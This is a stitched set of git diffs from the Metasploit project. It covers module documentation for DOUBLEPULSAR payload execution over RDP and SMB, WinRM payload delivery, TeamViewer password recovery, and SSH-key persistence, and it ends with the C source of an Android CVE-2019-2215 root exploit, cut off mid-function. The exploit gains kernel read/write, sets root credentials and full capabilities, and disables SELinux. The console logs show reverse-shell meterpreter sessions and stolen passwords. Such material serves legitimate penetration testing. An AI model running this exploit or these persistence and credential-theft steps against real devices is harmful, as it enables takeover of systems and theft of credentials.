  A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)

 ## Verification Steps
@@ -0,0 +1,99 @@
+## Introduction
+
+This module executes a Metasploit payload against the Equation Group's
+DOUBLEPULSAR implant for RDP.
+
+While this module primarily performs code execution against the implant,
+the `Neutralize implant` target allows you to disable the implant.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Execute payload (x64)
+1   Neutralize implant
+```
+
+## Options
+
+**DefangedMode**
+
+Set this to `false` to disable defanged mode and enable module
+functionality. Set this only if you're SURE you want to proceed.
+
+**ProcessName**
+
+Set this to the userland process you want to inject the payload into.
+Defaults to `spoolsv.exe`.
+
+## Usage
+
+Pinging the implant:
+
+```
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check
+
+[*] 192.168.56.115:3389 - Verifying RDP protocol...
+[*] 192.168.56.115:3389 - Attempting to connect using TLS security
+[*] 192.168.56.115:3389 - Swapping plain socket to SSL
+[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
+[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
+[+] 192.168.56.115:3389 - The target is vulnerable.
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
+```
+
+Executing a payload:
+
+```
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload
+target => Execute payload
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.115:3389 - Verifying RDP protocol...
+[*] 192.168.56.115:3389 - Attempting to connect using TLS security
+[*] 192.168.56.115:3389 - Swapping plain socket to SSL
+[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
+[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
+[*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
+[*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
+[*] 192.168.56.115:3389 - Sending shellcode to DOUBLEPULSAR
+[*] Sending stage (206403 bytes) to 192.168.56.115
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-11-25 18:10:21 -0600
+[+] 192.168.56.115:3389 - Payload execution successful
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-S7TDBIENPVM
+OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+Neutralizing the implant:
+
+```
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant
+target => Neutralize implant
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.115:3389 - Verifying RDP protocol...
+[*] 192.168.56.115:3389 - Attempting to connect using TLS security
+[*] 192.168.56.115:3389 - Swapping plain socket to SSL
+[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
+[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
+[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
+[*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
+[+] 192.168.56.115:3389 - Implant neutralization successful
+[*] Exploit completed, but no session was created.
+msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >
+```
@@ -29,7 +29,6 @@ More information available at [Gotham Digital Science Security](https://blog.gds

  Share name (Default: Random)

-
 ## Scenarios

 ### Domain Group Policy
@@ -41,7 +40,7 @@ In this scenario, the following computers are present:

 The module sets up the SMB share and VBScript file. Out of band (outside the scope of this module or docs) a Group Policy is simply applied to the `OU` computer container.
 Next, the Win 7 box grabs the payload, in this case the meterpreter reverse_tcp stager on boot, with `SYSTEM` privs because its executed as a start up script.
-Theoretically, any computer in that `OU` would also execute the script on started up. 
+Theoretically, any computer in that `OU` would also execute the script on started up.

  ```
  msf > use modules/exploits/windows/smb/group_policy_startup
@@ -11,7 +11,7 @@ the `Neutralize implant` target allows you to disable the implant.
 ```
 Id  Name
 --  ----
-0   Execute payload
+0   Execute payload (x64)
 1   Neutralize implant
 ```

@@ -32,22 +32,22 @@ Defaults to `spoolsv.exe`.
 Pinging the implant:

 ```
-msf5 exploit(windows/smb/doublepulsar_rce) > check
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > check

 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
 [!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
 [+] 192.168.56.115:445 - The target is vulnerable.
-msf5 exploit(windows/smb/doublepulsar_rce) >
+msf5 exploit(windows/smb/smb_doublepulsar_rce) >
 ```

 Executing a payload:

 ```
-msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Execute\ payload
 target => Execute payload
-msf5 exploit(windows/smb/doublepulsar_rce) > run
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > run

 [*] Started reverse TCP handler on 192.168.56.1:4444
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
@@ -78,9 +78,9 @@ meterpreter >
 Neutralizing the implant:

 ```
-msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Neutralize\ implant
 target => Neutralize implant
-msf5 exploit(windows/smb/doublepulsar_rce) > run
+msf5 exploit(windows/smb/smb_doublepulsar_rce) > run

 [*] Started reverse TCP handler on 192.168.56.1:4444
 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
@@ -90,5 +90,5 @@ msf5 exploit(windows/smb/doublepulsar_rce) > run
 [*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
 [+] 192.168.56.115:445 - Implant neutralization successful
 [*] Exploit completed, but no session was created.
-msf5 exploit(windows/smb/doublepulsar_rce) >
+msf5 exploit(windows/smb/smb_doublepulsar_rce) >
 ```
@@ -1,9 +1,9 @@
 ## Vulnerable Application

-WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). 
+WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol).
 This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.

-**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. 
+**IMPORTANT:** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return.

 ## Example Usage

@@ -1,16 +1,12 @@
-The following is the recommended format for module documentation.
-But feel free to add more content/sections to this.
+The following is the recommended format for module documentation. But feel free to add more content/sections to this.
 One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
 functioning in 5+ years, so giving links or specific examples can be VERY helpful.

 ## Vulnerable Application

-  Instructions to get the vulnerable application.  If applicable, include links to the vulnerable install files,
-  as well as instructions on installing/configuring the environment if it is different than a standard install.
-  Much of this will come from the PR, and can be copy/pasted.
+Instructions to get the vulnerable application.  If applicable, include links to the vulnerable install files, as well as instructions on installing/configuring the environment if it is different than a standard install. Much of this will come from the PR, and can be copy/pasted.

 ## Verification Steps
-
  Example steps in this format (is also in the PR):

  1. Install the application
@@ -18,18 +14,19 @@ functioning in 5+ years, so giving links or specific examples can be VERY helpfu
  3. Do: ```use [module path]```
  4. Do: ```run```
  5. You should get a shell.
-
+ 
 ## Options
+List each option and how to use it. 

-  **Option name**
+### Option Name

-  Talk about what it does, and how to use it appropriately.  If the default value is likely to change, include the default value here.
+Talk about what it does, and how to use it appropriately.  If the default value is likely to change, include the default value here.

 ## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.

-### Version of software and OS as applicable

-  Specific demo of using the module that might be useful in a real world scenario.
+### Version and OS

  ```
  code or console output
@@ -43,4 +40,4 @@ functioning in 5+ years, so giving links or specific examples can be VERY helpfu
  msf > use module_name
  msf auxiliary(module_name) > set POWERLEVEL >9000
  msf auxiliary(module_name) > exploit
-  ```
+  ```
@@ -0,0 +1,40 @@
+## Vulnerable Application
+
+  Any Windows host with a `meterpreter` session and TeamViewer 7+
+  installed. The following passwords will be searched for and recovered:
+  
+  * Options Password -- All module-supported TeamViewer versions (7+)
+  * Unattended Password -- TeamViewer versions 7 - 9
+  * License Key -- TeamViewer versions 7 - 14
+  
+### Installation Steps
+
+  1. Download the latest installer of TeamViewer.
+  2. Select "Custom Install With Unattended Password" during
+    installation
+  3. After installation, navigate to
+    `Extra > Options > Security > Advanced > Show Advanced Settings` and
+    set the "Options Password"
+    * Options can also be exported to a .reg file from here.
+
+## Verification Steps
+
+  1. Get a `meterpreter` session on a Windows host.
+  2. Do: ```run post/windows/gather/credentials/teamviewer_passwords```
+  3. If the system has registry keys for TeamViewer passwords they will be printed out.
+
+## Options
+
+  None.
+
+## Scenarios
+
+```
+meterpreter > run post/windows/gather/credentials/teamviewer_passwords 
+
+[*] Finding TeamViewer Passwords on WEQSQUGO-2156
+[+] Found Exported Unattended Password: P@$$w0rd
+[+] Found Options Password: op*****5
+[+] Passwords stored in: /home/blurbdust/.msf4/loot/20200207052401_default_***.***.***.***_host.teamviewer__588749.txt
+meterpreter > 
+```
@@ -0,0 +1,70 @@
+## Creating A Testing Environment
+
+To use this module you need an administrative Meterpreter or shell session on a Windows 10, 1809 release or higher.
+
+This module has been tested against:
+
+  1. Windows 10, 1903.
+
+This module was not tested against, but may work against:
+
+  1. Windows 10, 1809 and above.
+
+Versions prior to Windows 10 are not supported.
+
+## Module Options
+- **INSTALL_SERVER** - Install OpenSSH.Server for Windows (default: true)
+- **INSTALL_CLIENT** - Install OpenSSH.Client for Windows (default: true)
+- **UNINSTALL_SERVER** - Uninstall OpenSSH.Server for Windows (default: false)
+- **UNINSTALL_CLIENT** - Uninstall OpenSSH.Client for Windows (default: false)
+- **SERVER_VER** - OpenSSH.Server version (default "OpenSSH.Server~~~~0.0.1.0")
+- **CLIENT_VER** - OpenSSH.Client version (default "OpenSSH.Client~~~~0.0.1.0")
+- **AUTOSTART** - Sets sshd service to startup automatically at system boot for persistence (default: true)
+
+### Verification Steps
+
+  1. Start msfconsole
+  2. Obtain a meterpreter or shell session
+  3. Do: `use post/windows/manage/install_ssh`
+  4. Do: `set session #`
+  5. Do: `run`
+  6. Open a new terminal and test SSH access: `ssh user@10.10.10.10`
+
+## Scenarios
+
+### Install OpenSSH on Windows
+
+```
+  msf5 > use post/windows/manage/install_ssh 
+  msf5 post(windows/manage/install_ssh) > set SESSION 1 
+  SESSION => 1
+  msf5 post(windows/manage/install_ssh) > exploit 
+
+  [*] Installing OpenSSH.Server
+  [*] Installing OpenSSH.Client
+  [*] Post module execution completed
+```
+
+Utilities such as ssh, sftp, and sshfs may be used over the Windows SSH session.
+When combined with capabilities such as SSH forwarding, SSH on Windows can provide pentesters excellent utility and flexibility.
+
+### Uninstall OpenSSH on Windows
+
+```
+  msf5 > use post/windows/manage/install_ssh 
+  msf5 post(windows/manage/install_ssh) > set SESSION 1 
+  SESSION => 1
+  msf5 post(windows/manage/install_ssh) > set INSTALL_CLIENT false 
+  INSTALL_CLIENT => false
+  msf5 post(windows/manage/install_ssh) > set INSTALL_SERVER false 
+  INSTALL_SERVER => false
+  msf5 post(windows/manage/install_ssh) > set UNINSTALL_CLIENT true 
+  UNINSTALL_CLIENT => true
+  msf5 post(windows/manage/install_ssh) > set UNINSTALL_SERVER true 
+  UNINSTALL_SERVER => true
+  msf5 post(windows/manage/install_ssh) > exploit 
+
+  [*] Uninstalling OpenSSH.Server
+  [*] Uninstalling OpenSSH.Client
+  [*] Post module execution completed
+```
@@ -0,0 +1,89 @@
+This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
+
+### Creating A Testing Environment
+
+  This module has been tested against:
+
+1. Windows 10, 1903
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  3. Do: `use post/windows/manage/sshkey_persistence`
+  4. Do: `set session #`
+  5. Optional Do: `set USERNAME`
+  6. Optional Do: `set SSHD_CONFIG`
+  7. Do: `run`
+
+
+## Options
+
+  **SSHD_CONFIG**
+
+  Location of the sshd_config file on the remote system.
+  We use this to determine if the authorized_keys file location has changed on the system.
+  If it hasn't, we default to .ssh/authorized_keys
+
+  **USERNAME**
+
+  If set, we only write our key to this user.  If not, we'll write to all users
+
+  **PUBKEY**
+
+  A public key to use.  If not provided, a pub/priv key pair is generated automatically
+
+  **ADMIN_KEY_FILE**
+
+  Location of public keys for Administrator level accounts
+
+  **ADMIN**
+
+  Add public keys for gaining access to Administrator level accounts
+
+  **EDIT_CONFIG**
+
+  Allow the module to edit the sshd_config to enable public key authentication
+
+## Scenarios
+
+Get initial access
+
+    msf auxiliary(ssh_login) > exploit
+    
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),
+    46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic
+    #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (192.168.2.229:38886 -> 192.168.2.190:22) at 2016-06-19 09:52:48 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+Use the post module to write the ssh key
+
+    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
+    msf post(sshkey_persistence) > set SESSION 1
+    SESSION => 1
+    msf post(sshkey_persistence) > set CREATESSHFOLDER true
+    CreateSSHFolder => true    
+    msf5 post(windows/manage/sshkey_persistence) > run
+    
+    [*] Checking SSH Permissions
+    [*] Authorized Keys File: .ssh/authorized_keys
+    [+] Storing new private key as /Users/dwelch/.msf4/loot/20200205161837_default_172.16.128.153_id_rsa_706898.txt
+    [*] Adding key to C:\Users\Dean Welch\.ssh\authorized_keys
+    [+] Key Added
+    [*] Adding key to C:\Users\testAccount\.ssh\authorized_keys
+    [+] Key Added
+    [*] Post module execution completed
+
+Verify our access works
+
+    ssh -i /Users/dwelch/.msf4/loot/20200205153101_default_172.16.128.153_id_rsa_457054.txt testAccount@172.16.128.153
+    
+    Microsoft Windows [Version 10.0.18362.592]
+    (c) 2019 Microsoft Corporation. All rights reserved.
+    
+    testaccount@DESKTOP-V8L6UUD C:\Users\testAccount>
+
@@ -0,0 +1,11 @@
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_SRC_FILES := \
+	poc.c
+
+LOCAL_MODULE    := poc
+
+include $(BUILD_EXECUTABLE)
+
@@ -0,0 +1,15 @@
+all: build
+
+build:
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a
+
+push: build
+	adb push libs/arm64-v8a/poc /data/local/tmp/poc
+
+install: build
+	cp libs/arm64-v8a/poc ../../../../data/exploits/CVE-2019-2215/exploit 
+
+clean:
+	rm -rf libs
+	rm -rf obj
+
@@ -0,0 +1,12 @@
+
+## CVE-2019-2215
+
+Copy and pasted from:
+
+https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
+
+https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/
+
+https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c
+
+
@@ -0,0 +1,379 @@
+/*
+ * POC to gain arbitrary kernel R/W access using CVE-2019-2215
+ * https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
+ *
+ * Jann Horn & Maddie Stone of Google Project Zero
+ *
+ * 3 October 2019
+*/
+
+#define _GNU_SOURCE
+#include <stdbool.h>
+#include <sys/mman.h>
+#include <sys/wait.h>
+#include <ctype.h>
+#include <sys/uio.h>
+#include <err.h>
+#include <sched.h>
+#include <fcntl.h>
+#include <sys/epoll.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <linux/sched.h>
+#include <string.h>
+#include <sys/prctl.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <errno.h>
+
+#define BINDER_THREAD_EXIT 0x40046208ul
+// NOTE: we don't cover the task_struct* here; we want to leave it uninitialized
+#define BINDER_THREAD_SZ 0x190
+#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) //25
+#define WAITQUEUE_OFFSET 0xA0
+#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) //10
+
+void hexdump_memory(unsigned char *buf, size_t byte_count) {
+  unsigned long byte_offset_start = 0;
+  if (byte_count % 16)
+    errx(1, "hexdump_memory called with non-full line");
+  for (unsigned long byte_offset = byte_offset_start; byte_offset < byte_offset_start + byte_count;
+          byte_offset += 16) {
+    char line[1000];
+    char *linep = line;
+    linep += sprintf(linep, "%08lx  ", byte_offset);
+    for (int i=0; i<16; i++) {
+      linep += sprintf(linep, "%02hhx ", (unsigned char)buf[byte_offset + i]);
+    }
+    linep += sprintf(linep, " |");
+    for (int i=0; i<16; i++) {
+      char c = buf[byte_offset + i];
+      if (isalnum(c) || ispunct(c) || c == ' ') {
+        *(linep++) = c;
+      } else {
+        *(linep++) = '.';
+      }
+    }
+    linep += sprintf(linep, "|");
+    puts(line);
+  }
+}
+
+int epfd;
+
+void *dummy_page_4g_aligned;
+unsigned long current_ptr;
+int binder_fd;
+
+void leak_task_struct(void)
+{
+  struct epoll_event event = { .events = EPOLLIN };
+  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");
+
+  struct iovec iovec_array[IOVEC_ARRAY_SZ];
+  memset(iovec_array, 0, sizeof(iovec_array));
+
+  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
+  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
+  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
+  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;
+
+  int b;
+  
+  int pipefd[2];
+  if (pipe(pipefd)) err(1, "pipe");
+  if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000) err(1, "pipe size");
+  static char page_buffer[0x1000];
+  //if (write(pipefd[1], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "fill pipe");
+
+  pid_t fork_ret = fork();
+  if (fork_ret == -1) err(1, "fork");
+  if (fork_ret == 0){
+    /* Child process */
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+    sleep(2);
+    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
+    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
+    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
+    // first page: dummy data
+    if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
+    close(pipefd[1]);
+    printf("CHILD: Finished write to FIFO.\n");
+
+    exit(0);
+  }
+  //printf("PARENT: Calling READV\n");
+  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
+  b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
+  printf("writev() returns 0x%x\n", (unsigned int)b);
+  // second page: leaked data
+  if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
+  //hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer));
+
+  printf("PARENT: Finished calling READV\n");
+  int status;
+  if (wait(&status) != fork_ret) err(1, "wait");
+
+  current_ptr = *(unsigned long *)(page_buffer + 0xe8);
+  printf("current_ptr == 0x%lx\n", current_ptr);
+}
+
+void clobber_addr_limit(void)
+{
+  struct epoll_event event = { .events = EPOLLIN };
+  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");
+
+  struct iovec iovec_array[IOVEC_ARRAY_SZ];
+  memset(iovec_array, 0, sizeof(iovec_array));
+
+  unsigned long second_write_chunk[] = {
+    1, /* iov_len */
+    0xdeadbeef, /* iov_base (already used) */
+    0x8 + 2 * 0x10, /* iov_len (already used) */
+    current_ptr + 0x8, /* next iov_base (addr_limit) */
+    8, /* next iov_len (sizeof(addr_limit)) */
+    0xfffffffffffffffe /* value to write */
+  };
+
+  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
+  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; /* wq->task_list->next */
+  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
+  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
+  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
+  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */
+
+  int socks[2];
+  if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks)) err(1, "socketpair");
+  if (write(socks[1], "X", 1) != 1) err(1, "write socket dummy byte");
+
+  pid_t fork_ret = fork();
+  if (fork_ret == -1) err(1, "fork");
+  if (fork_ret == 0){
+    /* Child process */
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+    sleep(2);
+    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
+    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
+    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
+    if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
+      err(1, "write second chunk to socket");
+    exit(0);
+  }
+  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
+  struct msghdr msg = {
+    .msg_iov = iovec_array,
+    .msg_iovlen = IOVEC_ARRAY_SZ
+  };
+  int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);
+  printf("recvmsg() returns %d, expected %lu\n", recvmsg_result,
+      (unsigned long)(iovec_array[IOVEC_INDX_FOR_WQ].iov_len +
+      iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len +
+      iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len));
+}
+
+int kernel_rw_pipe[2];
+void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {
+  errno = 0;
+  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
+  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");
+  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");
+}
+void kernel_read(unsigned long kaddr, void *buf, unsigned long len) {
+  errno = 0;
+  if (len > 0x1000) errx(1, "kernel reads over PAGE_SIZE are messy, tried 0x%lx", len);
+  if (write(kernel_rw_pipe[1], (void*)kaddr, len) != len) err(1, "kernel_read failed to read kernel memory");
+  if (read(kernel_rw_pipe[0], buf, len) != len) err(1, "kernel_read failed to write out to userspace");
+}
+unsigned long kernel_read_ulong(unsigned long kaddr) {
+  unsigned long data;
+  kernel_read(kaddr, &data, sizeof(data));
+  return data;
+}
+unsigned long kernel_read_uint(unsigned long kaddr) {
+  unsigned int data;
+  kernel_read(kaddr, &data, sizeof(data));
+  return data;
+}
+void kernel_write_ulong(unsigned long kaddr, unsigned long data) {
+  kernel_write(kaddr, &data, sizeof(data));
+}
+void kernel_write_uint(unsigned long kaddr, unsigned int data) {
+  kernel_write(kaddr, &data, sizeof(data));
+}
+
+// Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
+// data from `pahole` on my own build with the same .config
+#define OFFSET__task_struct__mm 0x520
+#define OFFSET__task_struct__cred 0x790
+#define OFFSET__mm_struct__user_ns 0x300
+#define OFFSET__uts_namespace__name__version 0xc7
+// SYMBOL_* are relative to _head; data from /proc/kallsyms on userdebug
+#define SYMBOL__init_user_ns 0x202f2c8
+#define SYMBOL__init_task 0x20257d0
+#define SYMBOL__init_uts_ns 0x20255c0
+
+#define OFFSET__task_struct__thread_info__flags 0
+#define SYMBOL__selinux_enforcing 0x23ce4a8 // Grant: recovered using droidimg+miasm
+
+int main(void) {
+  printf("Starting POC\n");
+  //pin_to(0);
+
+  dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+  if (dummy_page_4g_aligned != (void*)0x100000000UL)
+    err(1, "mmap 4g aligned");
+  if (pipe(kernel_rw_pipe)) err(1, "kernel_rw_pipe");
+
+  binder_fd = open("/dev/binder", O_RDONLY);
+  epfd = epoll_create(1000);
+  leak_task_struct();
+  clobber_addr_limit();
+
+  setbuf(stdout, NULL);
+  printf("should have stable kernel R/W now\n");
+
+  /*size_t readsize = 0x1000;*/
+  /*void* readbuf = malloc(readsize);*/
+  /*kernel_read(current_ptr, readbuf, readsize);*/
+  /*hexdump_memory(readbuf, readsize);*/
+
+  /*in case you want to do stuff with the creds, to show that you can get them:*/
+  unsigned long current_mm = kernel_read_ulong(current_ptr + OFFSET__task_struct__mm);
+  printf("current->mm == 0x%lx\n", current_mm);
+  unsigned long current_user_ns = kernel_read_ulong(current_mm + OFFSET__mm_struct__user_ns);
+  printf("current->mm->user_ns == 0x%lx\n", current_user_ns);
+  unsigned long kernel_base = current_user_ns - SYMBOL__init_user_ns;
+  printf("kernel base is 0x%lx\n", kernel_base);
+  if (kernel_base & 0xfffUL) errx(1, "bad kernel base (not 0x...000)");
+  unsigned long init_task = kernel_base + SYMBOL__init_task;
+  printf("&init_task == 0x%lx\n", init_task);
+  unsigned long init_task_cred = kernel_read_ulong(init_task + OFFSET__task_struct__cred);
+  printf("init_task.cred == 0x%lx\n", init_task_cred);
+  unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred);
+  printf("current->cred == 0x%lx\n", my_cred);
+
+  unsigned long my_uid = my_cred + 4;
+  unsigned long my_suid = my_uid + 8;
+  unsigned long my_euid = my_uid + 16;
+  unsigned long my_fsuid = my_uid + 24;
+  unsigned long uid = kernel_read_ulong(my_uid);
+  printf("uid == 0x%lx\n", uid);
+  kernel_write_ulong(my_uid, 0);
+  unsigned long suid = kernel_read_ulong(my_suid);
+  printf("suid == 0x%lx\n", suid);
+  kernel_write_ulong(my_suid, 0);
+  unsigned long euid = kernel_read_ulong(my_euid);
+  printf("euid == 0x%lx\n", euid);
+  kernel_write_ulong(my_euid, 0);
+  unsigned long fsuid = kernel_read_ulong(my_fsuid);
+  printf("fsuid == 0x%lx\n", fsuid);
+  kernel_write_ulong(my_fsuid, 0);
+
+  if (getuid() != 0) {
+    printf("Something went wrong changing our UID to root!\n");
+    exit(1);
+  }
+
+
+  // reset securebits
+  kernel_write_uint(my_cred+0x24, 0);
+
+  // change capabilities to everything (perm, effective, bounding)
+  for (int i = 0; i < 3; i++)
+    kernel_write_ulong(my_cred+0x30 + i*8, 0x3fffffffffUL);
+
+  printf("Capabilities set to ALL\n");
+
+#if 0
+  // Grant: this was a failed attempt of just changing my SELinux SID to init's (sid = 7)
+  // It was "working", but my process's pty would hang, so I couldnt interact with a shell
+  // From here I just disabled SELinux
+
+  // change SID to init
+  for (int i = 0; i < 2; i++)
+    kernel_write_uint(current_cred_security + i*4, 1);
+  printf("[+] before 2\n");
+  kernel_write_uint(current_cred_security + 0, 1);
+  printf("[+] before 3\n");
+  kernel_write_uint(current_cred_security + 8, 7);
+
+  kernel_write_ulong(current_cred_security, 0x0100000001UL);
+
+  kernel_write_uint(current_cred_security + 8, 7);
+  printf("[+] SID -> init (7)\n");
+#endif
+
+  // Grant: was checking for this earlier, but it's not set, so I moved on
+  // printf("PR_GET_NO_NEW_PRIVS %d\n", prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0));
+
+  unsigned int enforcing = kernel_read_uint(kernel_base + SYMBOL__selinux_enforcing);
+
+  printf("SELinux status = %u\n", enforcing);
+
+  if (enforcing) {
+    printf("Setting SELinux to permissive\n");
+    kernel_write_uint(kernel_base + SYMBOL__selinux_enforcing, 0);
+  } else {
+    printf("SELinux is already in permissive mode\n");
+  }
+
+  // Grant: We want to be as powerful as init, which includes mounting in the global namespace
+  printf("Re-joining the init mount namespace...\n");
+  int fd = open("/proc/1/ns/mnt", O_RDONLY);
+
+  if (fd < 0) {
